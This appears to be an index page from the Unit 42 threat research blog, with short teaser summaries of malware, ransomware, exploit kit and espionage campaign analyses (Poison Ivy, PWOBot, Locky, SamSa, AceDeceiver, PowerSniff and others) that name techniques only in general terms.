New Poison Ivy RAT Variant Targets Hong Kong Pro-Democracy Activists

Posted on by Micah Yates

Malware writers have always sought to develop feature-rich, easy to use tools that are also somewhat hard to detect via both host- and network-based detection systems.  For many years, one of the go-to families of malware used by both less-skilled and advanced actors has been the Poison Ivy (aka PIVY) RAT. Poison Ivy has a convenient graphical user interface (GUI) for managing compromised hosts and provides easy access to a rich suite of post-compromise tools. It is no surprise it’s now being used against pro-democracy organizations and supporters in Hong Kong that have long been a target of advanced attack campaigns.

Despite its simplicity and prevalence, detection rates for both AV and IDS systems has always been surprisingly low for Poison Ivy.  Possibly for these reasons, since the mid-2000s threat actors have frequently used Poison Ivy to establish beachheads within target organizations, although this occurs much less frequently today than in years past. Since the last public release of version 2.3.2 in 2008, new variants of the tool have been relatively rare, especially versions which modify the core communication protocols.

Unit 42 observed a new version of Poison Ivy which uses the popular search order hijacking, a/k/a “DLL Sideloading,” technique frequently seen in malware such as PlugX. The Poison Ivy builder has an output format option of either PE file or shellcode, and in this case the backdoor was built as shellcode and then obfuscated to help prevent detection.  While analyzing the sample, we also observed a modified network communication protocol which will be discussed in this blog. Continue reading "New Poison Ivy RAT Variant Targets Hong Kong Pro-Democracy Activists"

Python-Based PWOBot Targets European Organizations

Posted on by Josh Grunzweig

We have discovered a malware family named ‘PWOBot’ that is fairly unique because it is written entirely in Python, and compiled via PyInstaller to generate a Microsoft Windows executable. The malware has been witnessed affecting a number of Europe-based organizations, particularly in Poland. Additionally, the malware is delivered via a popular Polish file-sharing web service.

The malware itself provides a wealth of functionality, including the ability to download and execute files, execute Python code, log keystrokes, spawn a HTTP server, and mine digital currency via the victim’s CPUs and GPUs.

There are at least 12 variants of PWOBot, and the malware has been observed in attacks dating back to late 2013. More recent attacks have been observed affecting organizations between mid-to-late 2015. Continue reading "Python-Based PWOBot Targets European Organizations"

Click-Fraud Ramdo Malware Family Continues to Plague Users

Posted on by Josh Grunzweig

Be the first to receive the latest news, cyber threat intelligence and research from Unit 42. Subscribe Now

Ramdo is a family of malware that performs fraudulent website ‘clicks.’ Ramdo malware activity first surfaced in late 2013 and has since continued to infect machines worldwide, primarily through the use of exploit kits. In this blog post, we’ll take a deep dive into the technical aspects of the Ramdo malware itself, providing insight into how the malware functions, as well as techniques on how analysts can reverse-engineer this particular threat.

This research is a joint effort from Unit 42 and Dell Secureworks Counter Threat Unit. For more information about the Ramdo threat, please also refer to the published blog post from Dell Secureworks CTU.

For the remainder of this blog post, we will be dealing with the following sample, which first surfaced on January 22, 2016. Continue reading "Click-Fraud Ramdo Malware Family Continues to Plague Users"

Ransomware: Locky, TeslaCrypt, Other Malware Families Use New Tool To Evade Detection

Posted on by Jeff White

Today we identified a new tool actively being used by the Locky ransomware family to evade detection and potentially infect endpoints. Unit 42 identified slight changes in Locky detonations through the AutoFocus threat intelligence service, correlating global data to discover a new tool being used to pack multiple ransomware families. Adversaries are constantly seeking new techniques to bypass security controls, and based on data from AutoFocus, this represents a widespread update to their tradecraft.

In our analysis, multiple malware samples stood out due to what seemed like obfuscated API calls coming from a dictionary of embedded terms to resolve system functions and hide their true capabilities from commonly used static analysis tools. Continue reading "Ransomware: Locky, TeslaCrypt, Other Malware Families Use New Tool To Evade Detection"

Don’t Be an April Fool: Inside a Common Phone Scam

Posted on by Robert Falcone

One of our team members on Unit 42 recently received a phone call from a scammer, and today being April Fool's Day we decided to write about how we played along with the scammer to learn about his operation.

Unit 42 analyst Robert received a phone call from a Tech Support scammer who told him his system was compromised and was seen performing illegal activities. The scam relied solely on social engineering, which is a technique to manipulate a victim into doing something or to give up information, but in this case was intended to get Robert to pay the scammer for unneeded system protection services. Social engineering is used in a majority of cyber crime and espionage attacks, albeit in this scam it was conducted over the phone and not via e-mail or social networking.

This blog, in Robert's voice, recounts the story of this unsolicited call and provides a glimpse into this scam operation. We intend this story to be light reading for security professionals, but hope that it provides awareness for less technical folks into the social engineering techniques used in these types of scams. Continue reading "Don’t Be an April Fool: Inside a Common Phone Scam"

How the EITest Campaign's Path to Angler EK Evolved Over Time

Posted on by Brad Duncan

In October 2014, Malwarebytes identified a campaign based on thousands of compromised websites that kicked off an infection chain to Angler exploit kit (EK). It was named "EITest" campaign, because "EITest" was a variable consistently found in injected scripts across all of the compromised websites. Malwarebytes noted some changes in this campaign in 2015 and 2016.

Like others in the cybersecurity threat research community, we have been tracking the EITest campaign. This blog post focuses on network traffic and how indicators have changed over time. Continue reading "How the EITest Campaign's Path to Angler EK Evolved Over Time"

ProjectM: Link Found Between Pakistani Actor and Operation Transparent Tribe

Posted on by Robert Falcone

Be the first to receive the latest news, cyber threat intelligence and research from Unit 42. Subscribe Now

Unit 42 is currently researching an attack campaign that targets government and military personnel of India. This attack appears to overlap with the Operation Transparent Tribe and Operation C-Major campaigns that targeted Indian embassies in Saudi Arabia and Kazakhstan, as well as the Indian military.

We are tracking the group of actors involved in this campaign as ‘ProjectM.’ During our research, we found a linkage between the infrastructure used by ProjectM and an individual from Pakistan. We cannot definitively confirm this individual is involved with this attack campaign, but the evidence that we will discuss in this blog post suggests that it is highly likely that this individual has some involvement with the threat group.

This blog post highlights the trail of evidence individuals leave on the Internet when they are not careful about disguising their identity. All of the information collected about this actor is public and accessible through open source research. Continue reading "ProjectM: Link Found Between Pakistani Actor and Operation Transparent Tribe"

Palo Alto Networks Researchers Discover Critical IE Vulnerabilities

Posted on by ryanolson

Palo Alto Networks researchers Tongbo Luo and Hui Gao were credited with the discoveries of new critical Microsoft vulnerabilities affecting Internet Explorer (IE) versions 7, 8, 9, 10 and 11 on affected Windows clients. These vulnerabilities are documented in Microsoft Security Bulletin MS15-106 and MS15-112. Continue reading "Palo Alto Networks Researchers Discover Critical IE Vulnerabilities"

Evolution of SamSa Malware Suggests New Ransomware Tactics In Play

Posted on by Josh Grunzweig

Ransomware is often in the headlines as new families are discovered on an almost weekly basis. Historically, these families have shared one similarity – they have all been deployed by attackers casting a wide net and largely being victim-agnostic. In most cases, the adversaries have used phishing emails and exploit kits in a ‘spray and pray’ style tactic.

However, in recent months, a new trend seems to be emerging: targeted attacks where ransomware is deployed by threat actors after successfully gaining unauthorized access to an organization’s network. One malware family seen in such attacks is known as ‘SamSa’, ‘Samas’, ‘samsam’, or most recently, ‘MOKOPONI’. Reports on this malware family have previously been published by both Intel Security and Microsoft.

Palo Alto Networks has collected over 20 samples of this particular malware family, and we have identified over $70,000 USD in Bitcoin payments to the attacker (Cisco Talos yesterday reported this figure to be closer to $115,000 USD). This blog details the evolution of this malware family, which was first witnessed in December 2015, as well as provides various indicators of compromise (IOCs) that can be used by the security community. Continue reading "Evolution of SamSa Malware Suggests New Ransomware Tactics In Play"

Campaign Evolution: Darkleech to Pseudo-Darkleech and Beyond

Posted on by Brad Duncan

In 2015, Sucuri published two blog posts, one in March describing a pseudo-Darkleech campaign targeting WordPress sites, and another about its evolution the following December. Sites compromised by this campaign redirected unsuspecting users to an exploit kit (EK). The Sucuri posts describe patterns in the injected script related to this campaign. Since December 2015, patterns associated with pseudo-Darkleech have continued to evolve. Our blog post today will examine these changes.

However, before we look at the recent developments, we should understand how EKs fit into the overall picture and review the history of Darkleech.

Continue reading "Campaign Evolution: Darkleech to Pseudo-Darkleech and Beyond"

Locky Ransomware Installed Through Nuclear EK

Posted on by Brad Duncan

In February 2016, Unit 42 published detailed analysis of Locky ransomware. We certainly weren’t the only ones who saw this malware, and many others have also reported on it. Since that time, Locky has been frequently noted in various campaigns using malicious spam (malspam) to spread this relatively new strain of ransomware.

When we initially reported on Locky, attackers were distributing the malware using Microsoft Office documents with malicious macros to download and execute the ransomware. Attackers quickly added another tactic, sending e-mails with zip attachments containing malicious Javascript files to accomplish the same goal. However, exploit kits (EKs) have also been used to infect users with Locky from casual web browsing. This activity suggests that there are effectively two paths to Locky: one through malspam and another through EK traffic.

Continue reading "Locky Ransomware Installed Through Nuclear EK"

AceDeceiver: First iOS Trojan Exploiting Apple DRM Design Flaws to Infect Any iOS Device

Posted on by Claud Xiao

We’ve discovered a new family of iOS malware that successfully infected non-jailbroken devices we’ve named “AceDeceiver”.

What makes AceDeceiver different from previous iOS malware is that instead of abusing enterprise certificates as some iOS malware has over the past two years, AceDeceiver manages to install itself without any enterprise certificate at all. It does so by exploiting design flaws in Apple’s DRM mechanism, and even as Apple has removed AceDeceiver from App Store, it may still spread thanks to a novel attack vector.

AceDeceiver is the first iOS malware we’ve seen that abuses certain design flaws in Apple’s DRM protection mechanism -- namely FairPlay -- to install malicious apps on iOS devices regardless of whether they are jailbroken. This technique is called “FairPlay Man-In-The-Middle (MITM)” and has been used since 2013 to spread pirated iOS apps, but this is the first time we’ve seen it used to spread malware. (The FairPlay MITM attack technique was also presented at the USENIX Security Symposium in 2014; however, attacks using this technique are still occurring successfully.)

Continue reading "AceDeceiver: First iOS Trojan Exploiting Apple DRM Design Flaws to Infect Any iOS Device"

Digital Quartermaster Scenario Demonstrated in Attacks Against the Mongolian Government

Posted on by Josh Grunzweig

Unit 42 has collected multiple spear phishing emails, weaponized document files, and payloads that targeted various offices of the Mongolian government during the time period of August 2015 and February 2016. The phishing emails and document files leveraged a variety of geopolitically sensitive subject matters as attractive lures, such as events in Beijing, the Dalai Lama, North Korea relations, the Zika virus, and various legitimate appearing announcements. As we began to analyze and tear down the various samples we collected, we found significant overlaps with previously reported and documented adversary groups, attack campaigns, and their toolsets, exemplifying the concept of the Digital Quartermaster.

Continue reading "Digital Quartermaster Scenario Demonstrated in Attacks Against the Mongolian Government"

PowerSniff Malware Used in Macro-based Attacks

Posted on by Josh Grunzweig

Introduction

The concept of file-less malware is not a new one. Families like Poweliks, which abuse Microsoft’s PowerShell, have emerged in recent years and have garnered extensive attention due to their ability to compromise a system while leaving little or no trace of their presence to traditional forensic techniques.

System administrators have lauded the power and versatility of PowerShell since version 2.0’s integration into Windows 7. Unfortunately, with such versatility comes the opportunity for abuse, specifically surrounding the capability to write directly into memory of the host OS.

Typically, file-less malware has been observed in the context of Exploit Kits such as Angler. Palo Alto Networks has observed a recent high-threat spam campaign that is serving malicious macro documents used to execute PowerShell scripts which injects malware similar to the Ursnif family directly into memory. We call the malware PowerSniff. Continue reading "PowerSniff Malware Used in Macro-based Attacks"

Palo Alto Networks Researcher Discovers Critical IE Vulnerability

Posted on by ryanolson

Palo Alto Networks researcher Hui Gao was credited with the discovery of a new critical Microsoft vulnerability affecting Internet Explorer (IE) versions 9, 10 and 11. This vulnerability is covered in Microsoft’s March 2016 Security Bulletin and documented in Microsoft Security Bulletin MS16-023. Continue reading "Palo Alto Networks Researcher Discovers Critical IE Vulnerability"

Get the latest news, invites to events, and threat alerts

Default Heading

Read the article Right Arrow